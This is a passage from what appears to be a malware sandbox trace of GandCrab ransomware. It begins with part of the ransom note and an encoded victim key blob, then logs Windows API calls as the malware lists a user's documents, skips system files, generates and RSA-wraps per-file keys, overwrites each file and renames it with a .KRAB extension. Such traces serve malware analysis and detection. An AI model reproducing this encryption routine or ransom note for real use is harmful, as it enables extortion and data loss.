Follow the instructions on this page \r\r\n---------------------------------------------------------------------------------------- \r\n \r\r\nOn our page you will see instructions on payment and get the opportunity to decrypt 1 file for free. \r\r\n\r\nATTENTION!\r\r\nIN ORDER TO PREVENT DATA DAMAGE:\r\n\r\n* DO NOT MODIFY ENCRYPTED FILES\r\n* DO NOT CHANGE DATA BELOW\r\n\r\n---BEGIN GANDCRAB KEY---\r\nlAQAAHPTUHGrjb/dcqUrzDS2xomeC8P4CUSPNAOL+0Mo/RbLr0OaWU1FJb00XfFHXj6tOuf3fPEItNktL2VhtINGOMGKEAUgRHIwxSGaKwcSkEjDUL0HUwplREArY2eQK/2FlKmtVxY2cgAjLoWFXtwo2gEK4a1eyVpOdA/5PKA19vmu9D7IWlFZ8M2v2HcmX1WFwMSKKyCPyE3I12HtIyga2yppmGj/0kbeo4Pyss0DfwD9qQhlmbNwHCOobnSofdvP3cINJt0T+mj6E/gguxJb77VutzLS7ATQylX2An2d2MzGDkSiNzUWV0yDTYzmL5WDSsSyVbWoOteqpx5W43Cfpby5H7iD4Mk5vDzBWPVFeBH4GhKSNudNQl6iOb1l4eeUMuEBXGw0+BpkUrUAgQjBWLbJ6CleUr6MmODOH6A7Jhf60sNPZMijoWaqeecabt0KEf7vwtAKjxeXkDnboIObW61GiYye3Y4Tx1l6X4ZFSnOs4j5jePpy6IWD50Buvy4RFZAKh09rDrTVp5PPV5K0wx5ROUVxEFDMbKemGWn2kbJiiMXWKf9il9ecR7Vj6B9X2QxCxUUzPoOCetcS51SFmTzpNC24BpHiYhlhwBirS7mEqg9eHAs2+76DlthH0IYBlLrEZfZyF2GmyxnNSuiRvf66muc7RQYfG3jxGAECcWKNLqKv8fvy6Z8TXe6Wy3TAJ9Bs4xTAPNS0SMF465Ku6H3cEM/+Sga6KajwZhU3AgixnVgyRE321c0dFCBWzWXYlI72JWaaZIHuktcbpqOdgIM0s1zRRiik4jAuC9jbkuK4dcgArE7p/ZEF5efpIhovrn/JleylI8aSPNqecB9NGmRzRYsl1yx7R79uHvMfZXs9u6R7v6sJyePFcv2fFnDq/8LyXgfBE9ECjLuiUlSkGewajMUrZ37SpbSW8OrKVHO/wBgi22J5C1kUjTYx7CQfDqZArf9qjhD5TjMiNMJUTOcANT1k8LdJCX5YnEkqbql9zAKGPD3h85JtJy5d5qZmc1qVDvNq4JgortqMJN+wJ1cbi0dC0ZupdUMXdEyil5EVrOYjd7OcK256OyLJexaPYNoLMT7nNQFQdBAdgxrP1A2j17iR9Rncy0lG27vyzvnlxBJHtN4rzwPyJcWjijdp+tPdfwpkuUhL1s780j4MPPa6ZSqrbN1dVzXyLYpgTfUJlmuliMYsyPoNF0wncUp6xOYOyeuFYcAYzh6kio0hS/OQfq9DULy4jlRsz4upLH/t6I4C2/8Dhtc9am+2z9kXRqxFGT2X4svMmQoZzcM7WuEljG+iZFnGvqeC8n5vHYUfpc5fDXIAr/3POwA8reJF9MuTQQ1Y71BT3fv8E7sTer0XVOuLq5R4mK7sEM2n3/s8Xg1stfLsHdFcp4Hmv7zJXtlAL+R4H9W/nSZPojs1+CA3f3LfcV0a7HpDCnE+3xAWSnFQ2gRJqfwbzuEDyyCVnlyuJ3gtkbgNzq9B1APP/reqFbD0NTG+Qbvjfy1WKWsuD6289ARnmzQdZfMJBKc6RFzabP8o+FTdQ528K5/LT7x00/WeKSnwRm9OwlEw+VgWABWgavtON3e6mnQGl0Ht3WD/SoiTiUQhaoEEUIhq2bMJGacz0QBGGZmiesqKc5BNYY47mlOBt90VgLBU4CrLlcekD1QKjwWIv7VZ/6d9hWbB8r/E0K0I3RLvsz5vWO2nXOYF4tjdvIFwTL7vhZLqD68CF4elxti9nkRp6gejjvBin0GKFE4sn+7ygICF6nm51nbjx2PCS9UqKQVB18bAq1wqNncQG3eriEdZiQnDmTTBJwZ6wxpzlzgiHPxH2MQl59eCy06ZlQ4pRy8AIZxYSs8MjywVkVMf5xfLKSSVC62MPhaeUAB6K7uhE53Kh/oFl2ty6x3FceOAGIk+6qZNV46mVnA0GY1UlOP7S+iVlY0LkPprvD5AwUQwkDA3J2EcOBy5zS0VDHF/IytPJedv/7il5EehJa3AjJJxYGvWERQaYZIUHY/zL8TGo2R8/ZR5MxJqHNldb8Qd8e6doJuxjxiJYrhGVvyhtJA622V6kMSz5u9Zt2BKOap2t+iec6qvzJ66awl54zVCYGCWnYUJ0Gr+HJQiCb+f9SsuUKy0pCXHEtL7hiZI7EOOMD7fkCREB/rydvt9VVgNLaxwvILFzP8c8FdqundPbfSwa3uorXdvHPZwzmxgXTCDqSdOEPl1K4/SIPmI5XHa0B26K6PumAdOtmc=\r\n---END GANDCRAB KEY---\r\n\r\n---BEGIN PC DATA---\r\nwfKD6iudumBkmpL8IRr4U4WxPFasOVPtwzxuOrz15VYnvLCWAh5YYedd8JZ0TohRkHY+7lVWgLeoTG2H6B5UBLbzu9M274X6G0GXDCriMpJ288/FKv/amF6obpAeLpej5fxw2X3xAZKuipuhf0T/Aq8AmLZ0OOqX4bnabVckN3QybYaW5sCbYapYDKSRxsQpKY4m29eAXVK1ZEZVsQONuUHcKCJJ2P+MK0OxMKkPxYoALGmTApxSmtAoT3Z6P6Q/GfqS1pdzxDbVjd1AG3hpl55nRN0JCAMxfQ7GDJ0r+X0/Si/FGQ/ukeotJdiuqcCnrbrH57Rit7F/kRzBs+Lx/2c2Q+t0GtNYPlrXBiXt/hGHEd0b9SdH4o+4Laa5Y59yPYyu2Qiiy5RtTRYqBlPKJPYJzJFtwNYoDRPKnK0+De5cAL2fimEyg6RrIA32xA9Kxw7zZibpCBFJ3vTLMeag1wIZNXQARgyKKDnc1lDgdH8NmV7f2yy3QRtn8rJ3lpuw5nIKVY/pfTfifFIcKcAhPzVN238JQy/C1qZGEv3tLUi+BdhMPpGxHsMOI7+QRdQP94kvV//uurM=\r\n---END PC DATA---") returned 4023 [0090.779] WriteFile (in: hFile=0x734, lpBuffer=0x2f20000*, nNumberOfBytesToWrite=0x1f6e, lpNumberOfBytesWritten=0x338eaa0, lpOverlapped=0x0 | out: lpBuffer=0x2f20000*, lpNumberOfBytesWritten=0x338eaa0*=0x1f6e, lpOverlapped=0x0) returned 1 [0090.779] CloseHandle (hObject=0x734) returned 1 [0090.779] VirtualFree (lpAddress=0x2f30000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0090.780] VirtualAlloc (lpAddress=0x0, dwSize=0x410, flAllocationType=0x3000, flProtect=0x4) returned 0x2f30000 [0090.780] GetSystemTime (in: lpSystemTime=0x2f30400 | out: lpSystemTime=0x2f30400*(wYear=0x7e2, wMonth=0x7, wDayOfWeek=0x4, wDay=0x5, wHour=0xd, wMinute=0x2d, wSecond=0x25, wMilliseconds=0x3d3)) [0090.780] VirtualAlloc (lpAddress=0x0, dwSize=0xe0c, flAllocationType=0x3000, flProtect=0x4) returned 0x2f50000 [0090.780] GetWindowsDirectoryW (in: lpBuffer=0x2f50000, uSize=0x100 | out: lpBuffer="C:\\Windows") returned 0xa [0090.781] GetVolumeInformationW (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x2f50200, nVolumeNameSize=0x100, lpVolumeSerialNumber=0x2f50600, lpMaximumComponentLength=0x2f50608, lpFileSystemFlags=0x2f50604, lpFileSystemNameBuffer=0x2f50400, nFileSystemNameSize=0x100 | out: lpVolumeNameBuffer="SYSTEM", lpVolumeSerialNumber=0x2f50600*=0xd2ca4def, lpMaximumComponentLength=0x2f50608*=0xff, lpFileSystemFlags=0x2f50604*=0x3e700ff, lpFileSystemNameBuffer="NTFS") returned 1 [0090.781] wsprintfW (in: param_1=0x2f30000, param_2="%s%x%x%x%x.lock" | out: param_1="C:\\Users\\CIiHmnxMn6Ps\\Documents\\fEXHt9X87hw5FTqPcrNK\\x5rBOxA2\\xRugo\\d2ca4a08d2ca4dee3d.lock") returned 91 [0090.781] CreateFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\Documents\\fEXHt9X87hw5FTqPcrNK\\x5rBOxA2\\xRugo\\d2ca4a08d2ca4dee3d.lock" (normalized: "c:\\users\\ciihmnxmn6ps\\documents\\fexht9x87hw5ftqpcrnk\\x5rboxa2\\xrugo\\d2ca4a08d2ca4dee3d.lock"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x4000002, hTemplateFile=0x0) returned 0x734 [0090.781] VirtualFree (lpAddress=0x2f50000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0090.782] VirtualFree (lpAddress=0x2f30000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0090.782] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\Documents\\fEXHt9X87hw5FTqPcrNK\\x5rBOxA2\\xRugo\\") returned 68 [0090.782] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\Documents\\fEXHt9X87hw5FTqPcrNK\\x5rBOxA2\\xRugo\\", lpString2="*" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\Documents\\fEXHt9X87hw5FTqPcrNK\\x5rBOxA2\\xRugo\\*") returned="C:\\Users\\CIiHmnxMn6Ps\\Documents\\fEXHt9X87hw5FTqPcrNK\\x5rBOxA2\\xRugo\\*" [0090.782] FindFirstFileW (in: lpFileName="C:\\Users\\CIiHmnxMn6Ps\\Documents\\fEXHt9X87hw5FTqPcrNK\\x5rBOxA2\\xRugo\\*", lpFindFileData=0x338ead0 | out: lpFindFileData=0x338ead0) returned 0xfbd2a0 [0090.783] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0090.783] FindNextFileW (in: hFindFile=0xfbd2a0, lpFindFileData=0x338ead0 | out: lpFindFileData=0x338ead0) returned 1 [0090.783] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0090.783] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0090.783] FindNextFileW (in: hFindFile=0xfbd2a0, lpFindFileData=0x338ead0 | out: lpFindFileData=0x338ead0) returned 1 [0090.783] lstrcmpW (lpString1="4wOpV.odt", lpString2=".") returned 1 [0090.783] lstrcmpW (lpString1="4wOpV.odt", lpString2="..") returned 1 [0090.783] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\Documents\\fEXHt9X87hw5FTqPcrNK\\x5rBOxA2\\xRugo\\", lpString2="4wOpV.odt" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\Documents\\fEXHt9X87hw5FTqPcrNK\\x5rBOxA2\\xRugo\\4wOpV.odt") returned="C:\\Users\\CIiHmnxMn6Ps\\Documents\\fEXHt9X87hw5FTqPcrNK\\x5rBOxA2\\xRugo\\4wOpV.odt" [0090.783] VirtualAlloc (lpAddress=0x0, dwSize=0x200, flAllocationType=0x3000, flProtect=0x4) returned 0x2f30000 [0090.783] wsprintfW (in: param_1=0x2f30000, param_2="%s.KRAB" | out: param_1="C:\\Users\\CIiHmnxMn6Ps\\Documents\\fEXHt9X87hw5FTqPcrNK\\x5rBOxA2\\xRugo\\4wOpV.odt.KRAB") returned 82 [0090.783] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\Documents\\fEXHt9X87hw5FTqPcrNK\\x5rBOxA2\\xRugo\\4wOpV.odt") returned 77 [0090.783] lstrlenW (lpString=".odt") returned 4 [0090.783] VirtualAlloc (lpAddress=0x0, dwSize=0xc, flAllocationType=0x3000, flProtect=0x4) returned 0x2f50000 [0090.784] wsprintfW (in: param_1=0x2f50000, param_2="%s " | out: param_1=".odt ") returned 5 [0090.784] VirtualFree (lpAddress=0x2f50000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0090.784] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\Documents\\fEXHt9X87hw5FTqPcrNK\\x5rBOxA2\\xRugo\\4wOpV.odt") returned 77 [0090.784] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\Documents\\fEXHt9X87hw5FTqPcrNK\\x5rBOxA2\\xRugo\\4wOpV.odt") returned 77 [0090.784] lstrcmpiW (lpString1="4wOpV.odt", lpString2="desktop.ini") returned -1 [0090.784] lstrcmpiW (lpString1="4wOpV.odt", lpString2="autorun.inf") returned -1 [0090.784] lstrcmpiW (lpString1="4wOpV.odt", lpString2="ntuser.dat") returned -1 [0090.784] lstrcmpiW (lpString1="4wOpV.odt", lpString2="iconcache.db") returned -1 [0090.784] lstrcmpiW (lpString1="4wOpV.odt", lpString2="bootsect.bak") returned -1 [0090.784] lstrcmpiW (lpString1="4wOpV.odt", lpString2="boot.ini") returned -1 [0090.784] lstrcmpiW (lpString1="4wOpV.odt", lpString2="ntuser.dat.log") returned -1 [0090.784] lstrcmpiW (lpString1="4wOpV.odt", lpString2="thumbs.db") returned -1 [0090.784] lstrcmpiW (lpString1="4wOpV.odt", lpString2="KRAB-DECRYPT.html") returned -1 [0090.784] lstrcmpiW (lpString1="4wOpV.odt", lpString2="KRAB-DECRYPT.txt") returned -1 [0090.784] lstrcmpiW (lpString1="4wOpV.odt", lpString2="CRAB-DECRYPT.txt") returned -1 [0090.784] lstrcmpiW (lpString1="4wOpV.odt", lpString2="ntldr") returned -1 [0090.784] lstrcmpiW (lpString1="4wOpV.odt", lpString2="NTDETECT.COM") returned -1 [0090.784] lstrcmpiW (lpString1="4wOpV.odt", lpString2="Bootfont.bin") returned -1 [0090.784] VirtualAlloc (lpAddress=0x0, dwSize=0x208, flAllocationType=0x3000, flProtect=0x4) returned 0x2f50000 [0090.785] CryptAcquireContextW (in: phProv=0x338e9b4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x338e9b4*=0x10114e0) returned 1 [0090.786] VirtualAlloc (lpAddress=0x0, dwSize=0x21, flAllocationType=0x3000, flProtect=0x40) returned 0x3000000 [0090.787] GetModuleHandleA (lpModuleName="Advapi32.dll") returned 0x77990000 [0090.787] GetProcAddress (hModule=0x77990000, lpProcName="CryptGenRandom") returned 0x779b0df0 [0090.787] CryptGenRandom (in: hProv=0x10114e0, dwLen=0x20, pbBuffer=0x338ea4c | out: pbBuffer=0x338ea4c) returned 1 [0090.787] CryptReleaseContext (hProv=0x10114e0, dwFlags=0x0) returned 1 [0090.787] VirtualFree (lpAddress=0x3000000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0090.788] CryptAcquireContextW (in: phProv=0x338e9b4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x338e9b4*=0x1011678) returned 1 [0090.821] VirtualAlloc (lpAddress=0x0, dwSize=0x9, flAllocationType=0x3000, flProtect=0x40) returned 0x3000000 [0090.822] GetModuleHandleA (lpModuleName="Advapi32.dll") returned 0x77990000 [0090.823] GetProcAddress (hModule=0x77990000, lpProcName="CryptGenRandom") returned 0x779b0df0 [0090.823] CryptGenRandom (in: hProv=0x1011678, dwLen=0x8, pbBuffer=0x338ea6c | out: pbBuffer=0x338ea6c) returned 1 [0090.823] CryptReleaseContext (hProv=0x1011678, dwFlags=0x0) returned 1 [0090.823] VirtualFree (lpAddress=0x3000000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0090.824] CryptAcquireContextW (in: phProv=0x338e9ac, szContainer=0x0, szProvider="Microsoft Enhanced Cryptographic Provider v1.0", dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x338e9ac*=0x10111b0) returned 1 [0090.825] CryptImportKey (in: hProv=0x10111b0, pbData=0x2e90000, dwDataLen=0x114, hPubKey=0x0, dwFlags=0x0, phKey=0x338e9b0 | out: phKey=0x338e9b0*=0xfbd7a0) returned 1 [0090.825] CryptGetKeyParam (in: hKey=0xfbd7a0, dwParam=0x8, pbData=0x338e9a4, pdwDataLen=0x338e9a8, dwFlags=0x0 | out: pbData=0x338e9a4*=0x800, pdwDataLen=0x338e9a8*=0x4) returned 1 [0090.825] CryptEncrypt (in: hKey=0xfbd7a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2f50000*, pdwDataLen=0x338e9dc*=0xc8, dwBufLen=0x100 | out: pbData=0x2f50000*, pdwDataLen=0x338e9dc*=0x100) returned 1 [0090.826] GetLastError () returned 0x0 [0090.826] CryptDestroyKey (hKey=0xfbd7a0) returned 1 [0090.826] CryptReleaseContext (hProv=0x10111b0, dwFlags=0x0) returned 1 [0090.826] CryptAcquireContextW (in: phProv=0x338e9ac, szContainer=0x0, szProvider="Microsoft Enhanced Cryptographic Provider v1.0", dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x338e9ac*=0x1011898) returned 1 [0090.827] CryptImportKey (in: hProv=0x1011898, pbData=0x2e90000, dwDataLen=0x114, hPubKey=0x0, dwFlags=0x0, phKey=0x338e9b0 | out: phKey=0x338e9b0*=0xfbd3e0) returned 1 [0090.827] CryptGetKeyParam (in: hKey=0xfbd3e0, dwParam=0x8, pbData=0x338e9a4, pdwDataLen=0x338e9a8, dwFlags=0x0 | out: pbData=0x338e9a4*=0x800, pdwDataLen=0x338e9a8*=0x4) returned 1 [0090.827] CryptEncrypt (in: hKey=0xfbd3e0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2f50100*, pdwDataLen=0x338e9dc*=0xc8, dwBufLen=0x100 | out: pbData=0x2f50100*, pdwDataLen=0x338e9dc*=0x100) returned 1 [0090.833] GetLastError () returned 0x0 [0090.833] CryptDestroyKey (hKey=0xfbd3e0) returned 1 [0090.833] CryptReleaseContext (hProv=0x1011898, dwFlags=0x0) returned 1 [0090.833] CreateFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\Documents\\fEXHt9X87hw5FTqPcrNK\\x5rBOxA2\\xRugo\\4wOpV.odt" (normalized: "c:\\users\\ciihmnxmn6ps\\documents\\fexht9x87hw5ftqpcrnk\\x5rboxa2\\xrugo\\4wopv.odt"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x43c [0090.834] VirtualAlloc (lpAddress=0x0, dwSize=0x100001, flAllocationType=0x3000, flProtect=0x4) returned 0x3870000 [0090.834] VirtualAlloc (lpAddress=0x0, dwSize=0x100005, flAllocationType=0x3000, flProtect=0x4) returned 0x3b80000 [0090.834] ReadFile (in: hFile=0x43c, lpBuffer=0x3870000, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x338ea7c, lpOverlapped=0x0 | out: lpBuffer=0x3870000*, lpNumberOfBytesRead=0x338ea7c*=0x15714, lpOverlapped=0x0) returned 1 [0090.871] SetFilePointerEx (in: hFile=0x43c, liDistanceToMove=0xfffea8ec, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0090.871] WriteFile (in: hFile=0x43c, lpBuffer=0x3b80000*, nNumberOfBytesToWrite=0x15714, lpNumberOfBytesWritten=0x338ea78, lpOverlapped=0x0 | out: lpBuffer=0x3b80000*, lpNumberOfBytesWritten=0x338ea78*=0x15714, lpOverlapped=0x0) returned 1 [0090.872] WriteFile (in: hFile=0x43c, lpBuffer=0x2f50000*, nNumberOfBytesToWrite=0x208, lpNumberOfBytesWritten=0x338ea78, lpOverlapped=0x0 | out: lpBuffer=0x2f50000*, lpNumberOfBytesWritten=0x338ea78*=0x208, lpOverlapped=0x0) returned 1 [0090.872] VirtualFree (lpAddress=0x3870000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0090.876] VirtualFree (lpAddress=0x3b80000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0090.877] CloseHandle (hObject=0x43c) returned 1 [0090.877] VirtualFree (lpAddress=0x2f50000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0090.877] MoveFileW (lpExistingFileName="C:\\Users\\CIiHmnxMn6Ps\\Documents\\fEXHt9X87hw5FTqPcrNK\\x5rBOxA2\\xRugo\\4wOpV.odt" (normalized: "c:\\users\\ciihmnxmn6ps\\documents\\fexht9x87hw5ftqpcrnk\\x5rboxa2\\xrugo\\4wopv.odt"), lpNewFileName="C:\\Users\\CIiHmnxMn6Ps\\Documents\\fEXHt9X87hw5FTqPcrNK\\x5rBOxA2\\xRugo\\4wOpV.odt.KRAB" (normalized: "c:\\users\\ciihmnxmn6ps\\documents\\fexht9x87hw5ftqpcrnk\\x5rboxa2\\xrugo\\4wopv.odt.krab")) returned 1 [0090.878] VirtualFree (lpAddress=0x2f30000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0090.878] FindNextFileW (in: hFindFile=0xfbd2a0, lpFindFileData=0x338ead0 | out: lpFindFileData=0x338ead0) returned 1 [0090.879] lstrcmpW (lpString1="6p4trDe8K_8vpdH.ots", lpString2=".") returned 1 [0090.879] lstrcmpW (lpString1="6p4trDe8K_8vpdH.ots", lpString2="..") returned 1 [0090.879] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\Documents\\fEXHt9X87hw5FTqPcrNK\\x5rBOxA2\\xRugo\\", lpString2="6p4trDe8K_8vpdH.ots" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\Documents\\fEXHt9X87hw5FTqPcrNK\\x5rBOxA2\\xRugo\\6p4trDe8K_8vpdH.ots") returned="C:\\Users\\CIiHmnxMn6Ps\\Documents\\fEXHt9X87hw5FTqPcrNK\\x5rBOxA2\\xRugo\\6p4trDe8K_8vpdH.ots" [0090.879] VirtualAlloc (lpAddress=0x0, dwSize=0x200, flAllocationType=0x3000, flProtect=0x4) returned 0x2f30000 [0090.879] wsprintfW (in: param_1=0x2f30000, param_2="%s.KRAB" | out: param_1="C:\\Users\\CIiHmnxMn6Ps\\Documents\\fEXHt9X87hw5FTqPcrNK\\x5rBOxA2\\xRugo\\6p4trDe8K_8vpdH.ots.KRAB") returned 92 [0090.879] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\Documents\\fEXHt9X87hw5FTqPcrNK\\x5rBOxA2\\xRugo\\6p4trDe8K_8vpdH.ots") returned 87 [0090.879] lstrlenW (lpString=".ots") returned 4 [0090.879] VirtualAlloc (lpAddress=0x0, dwSize=0xc, flAllocationType=0x3000, flProtect=0x4) returned 0x2f50000 [0090.879] wsprintfW (in: param_1=0x2f50000, param_2="%s " | out: param_1=".ots ") returned 5 [0090.879] VirtualFree (lpAddress=0x2f50000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0090.880] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\Documents\\fEXHt9X87hw5FTqPcrNK\\x5rBOxA2\\xRugo\\6p4trDe8K_8vpdH.ots") returned 87 [0090.880] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\Documents\\fEXHt9X87hw5FTqPcrNK\\x5rBOxA2\\xRugo\\6p4trDe8K_8vpdH.ots") returned 87 [0090.880] lstrcmpiW (lpString1="6p4trDe8K_8vpdH.ots", lpString2="desktop.ini") returned -1 [0090.880] lstrcmpiW (lpString1="6p4trDe8K_8vpdH.ots", lpString2="autorun.inf") returned -1 [0090.880] lstrcmpiW (lpString1="6p4trDe8K_8vpdH.ots", lpString2="ntuser.dat") returned -1 [0090.880] lstrcmpiW (lpString1="6p4trDe8K_8vpdH.ots", lpString2="iconcache.db") returned -1 [0090.880] lstrcmpiW (lpString1="6p4trDe8K_8vpdH.ots", lpString2="bootsect.bak") returned -1 [0090.880] lstrcmpiW (lpString1="6p4trDe8K_8vpdH.ots", lpString2="boot.ini") returned -1 [0090.880] lstrcmpiW (lpString1="6p4trDe8K_8vpdH.ots", lpString2="ntuser.dat.log") returned -1 [0090.880] lstrcmpiW (lpString1="6p4trDe8K_8vpdH.ots", lpString2="thumbs.db") returned -1 [0090.880] lstrcmpiW (lpString1="6p4trDe8K_8vpdH.ots", lpString2="KRAB-DECRYPT.html") returned -1 [0090.880] lstrcmpiW (lpString1="6p4trDe8K_8vpdH.ots", lpString2="KRAB-DECRYPT.txt") returned -1 [0090.880] lstrcmpiW (lpString1="6p4trDe8K_8vpdH.ots", lpString2="CRAB-DECRYPT.txt") returned -1 [0090.880] lstrcmpiW (lpString1="6p4trDe8K_8vpdH.ots", lpString2="ntldr") returned -1 [0090.880] lstrcmpiW (lpString1="6p4trDe8K_8vpdH.ots", lpString2="NTDETECT.COM") returned -1 [0090.880] lstrcmpiW (lpString1="6p4trDe8K_8vpdH.ots", lpString2="Bootfont.bin") returned -1 [0090.880] VirtualAlloc (lpAddress=0x0, dwSize=0x208, flAllocationType=0x3000, flProtect=0x4) returned 0x2f50000 [0090.880] CryptAcquireContextW (in: phProv=0x338e9b4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x338e9b4*=0x1011018) returned 1 [0090.883] VirtualAlloc (lpAddress=0x0, dwSize=0x21, flAllocationType=0x3000, flProtect=0x40) returned 0x3000000 [0090.883] GetModuleHandleA (lpModuleName="Advapi32.dll") returned 0x77990000 [0090.883] GetProcAddress (hModule=0x77990000, lpProcName="CryptGenRandom") returned 0x779b0df0 [0090.883] CryptGenRandom (in: hProv=0x1011018, dwLen=0x20, pbBuffer=0x338ea4c | out: pbBuffer=0x338ea4c) returned 1 [0090.883] CryptReleaseContext (hProv=0x1011018, dwFlags=0x0) returned 1 [0090.883] VirtualFree (lpAddress=0x3000000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0090.884] CryptAcquireContextW (in: phProv=0x338e9b4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x338e9b4*=0x1011238) returned 1 [0090.886] VirtualAlloc (lpAddress=0x0, dwSize=0x9, flAllocationType=0x3000, flProtect=0x40) returned 0x3000000 [0090.887] GetModuleHandleA (lpModuleName="Advapi32.dll") returned 0x77990000 [0090.887] GetProcAddress (hModule=0x77990000, lpProcName="CryptGenRandom") returned 0x779b0df0 [0090.887] CryptGenRandom (in: hProv=0x1011238, dwLen=0x8, pbBuffer=0x338ea6c | out: pbBuffer=0x338ea6c) returned 1 [0090.887] CryptReleaseContext (hProv=0x1011238, dwFlags=0x0) returned 1 [0090.887] VirtualFree (lpAddress=0x3000000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0090.887] CryptAcquireContextW (in: phProv=0x338e9ac, szContainer=0x0, szProvider="Microsoft Enhanced Cryptographic Provider v1.0", dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x338e9ac*=0x1011678) returned 1 [0090.889] CryptImportKey (in: hProv=0x1011678, pbData=0x2e90000, dwDataLen=0x114, hPubKey=0x0, dwFlags=0x0, phKey=0x338e9b0 | out: phKey=0x338e9b0*=0xfbd3e0) returned 1 [0090.889] CryptGetKeyParam (in: hKey=0xfbd3e0, dwParam=0x8, pbData=0x338e9a4, pdwDataLen=0x338e9a8, dwFlags=0x0 | out: pbData=0x338e9a4*=0x800, pdwDataLen=0x338e9a8*=0x4) returned 1 [0090.889] CryptEncrypt (in: hKey=0xfbd3e0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2f50000*, pdwDataLen=0x338e9dc*=0xc8, dwBufLen=0x100 | out: pbData=0x2f50000*, pdwDataLen=0x338e9dc*=0x100) returned 1 [0090.889] GetLastError () returned 0x0 [0090.889] CryptDestroyKey (hKey=0xfbd3e0) returned 1 [0090.889] CryptReleaseContext (hProv=0x1011678, dwFlags=0x0) returned 1 [0090.889] CryptAcquireContextW (in: phProv=0x338e9ac, szContainer=0x0, szProvider="Microsoft Enhanced Cryptographic Provider v1.0", dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x338e9ac*=0x1010f90) returned 1 [0090.891] CryptImportKey (in: hProv=0x1010f90, pbData=0x2e90000, dwDataLen=0x114, hPubKey=0x0, dwFlags=0x0, phKey=0x338e9b0 | out: phKey=0x338e9b0*=0xfbd3e0) returned 1 [0090.891] CryptGetKeyParam (in: hKey=0xfbd3e0, dwParam=0x8, pbData=0x338e9a4, pdwDataLen=0x338e9a8, dwFlags=0x0 | out: pbData=0x338e9a4*=0x800, pdwDataLen=0x338e9a8*=0x4) returned 1 [0090.891] CryptEncrypt (in: hKey=0xfbd3e0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2f50100*, pdwDataLen=0x338e9dc*=0xc8, dwBufLen=0x100 | out: pbData=0x2f50100*, pdwDataLen=0x338e9dc*=0x100) returned 1 [0090.891] GetLastError () returned 0x0 [0090.891] CryptDestroyKey (hKey=0xfbd3e0) returned 1 [0090.891] CryptReleaseContext (hProv=0x1010f90, dwFlags=0x0) returned 1 [0090.891] CreateFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\Documents\\fEXHt9X87hw5FTqPcrNK\\x5rBOxA2\\xRugo\\6p4trDe8K_8vpdH.ots" (normalized: "c:\\users\\ciihmnxmn6ps\\documents\\fexht9x87hw5ftqpcrnk\\x5rboxa2\\xrugo\\6p4trde8k_8vpdh.ots"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x43c [0090.892] VirtualAlloc (lpAddress=0x0, dwSize=0x100001, flAllocationType=0x3000, flProtect=0x4) returned 0x3870000 [0090.892] VirtualAlloc (lpAddress=0x0, dwSize=0x100005, flAllocationType=0x3000, flProtect=0x4) returned 0x3b80000 [0090.892] ReadFile (in: hFile=0x43c, lpBuffer=0x3870000, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x338ea7c, lpOverlapped=0x0 | out: lpBuffer=0x3870000*, lpNumberOfBytesRead=0x338ea7c*=0x18b3d, lpOverlapped=0x0) returned 1 [0090.909] SetFilePointerEx (in: hFile=0x43c, liDistanceToMove=0xfffe74c3, lpNewFilePointer=0xffffffff, 